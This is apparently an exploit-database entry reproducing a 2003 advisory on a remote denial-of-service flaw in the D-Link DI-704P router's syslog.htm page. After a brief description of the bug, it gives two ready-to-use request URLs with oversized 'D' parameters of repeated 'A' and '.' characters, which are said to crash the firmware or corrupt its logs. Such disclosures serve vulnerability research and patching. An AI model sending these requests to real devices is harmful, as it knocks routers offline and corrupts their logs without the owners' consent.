D-Link DI-704P - Syslog.HTM Denial of Service

Author: Chris R
type: dos
platform: hardware
port: 
date_added: 2003-05-26 
date_updated: 2012-11-12 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7686/info

D-Link DI-704P has been reported prone to a remote denial of service vulnerability.

The issue presents itself in a D-Link web interface page. It has been reported that when excessive is data passed URI parameter in a request for the vulnerable page, the router firmware the device behaves in an unstable manner.

Subsequent malicious requests may result in a complete denial of service condition requiring a device reboot, or in corruption of device logs.

Although unconfirmed, it should be noted that other D-Link devices that use related firmware might also be affected.

http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

and

http://192.168.0.1/syslog.htm?
D=.........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
....................